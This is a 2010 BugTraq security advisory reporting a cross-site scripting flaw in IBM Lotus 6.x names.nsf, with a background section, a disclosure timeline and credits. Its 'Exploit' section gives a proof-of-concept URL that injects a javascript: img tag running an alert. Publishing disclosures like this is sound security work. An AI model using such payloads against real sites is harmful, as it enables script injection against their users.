BugTraq
IBM Lotus 6.x names.nsf Cross Site Scripting Vulnerability Mar 19 2010 08:57PM
lament ilhack org (1 replies)
=========================================

Yaniv Miron aka "Lament" Advisory March 12, 2010

IBM Lotus 6.x names.nsf Cross Site Scripting Vulnerability

=========================================

=====================

I. BACKGROUND

=====================

IBM Lotus Software delivers robust collaboration software that empowers

people to connect, collaborate, and innovate while optimizing the way they

work. With Lotus you can drive better business outcomes through

smarter collaboration.

http://www-01.ibm.com/software/lotus/

=====================

II. DESCRIPTION

=====================

A malicious attacker may inject scripts into the IBM Lotus application.

=====================

III. ANALYSIS

=====================

Exploitation of this vulnerability results in the execution of arbitrary

code using a malicious link.

=====================

IV. EXPLOIT

=====================

www.example.com/names.nsf/<img src="javascript:alert(31337)">

=====================

V. DISCLOSURE TIMELINE

=====================

Jan 2009 Vulnerability found

Jan 2009 Vendor Notification

March 2010 Public Disclosure

=====================

VI. CREDIT

=====================

Yaniv Miron aka "Lament".

lament (at) ilhack (dot) org [email concealed]

[ reply ]
Re: IBM Lotus 6.x names.nsf Cross Site Scripting Vulnerability May 24 2010 06:44PM
security curmudgeon (jericho attrition org)


 

Privacy Statement
Copyright 2010, SecurityFocus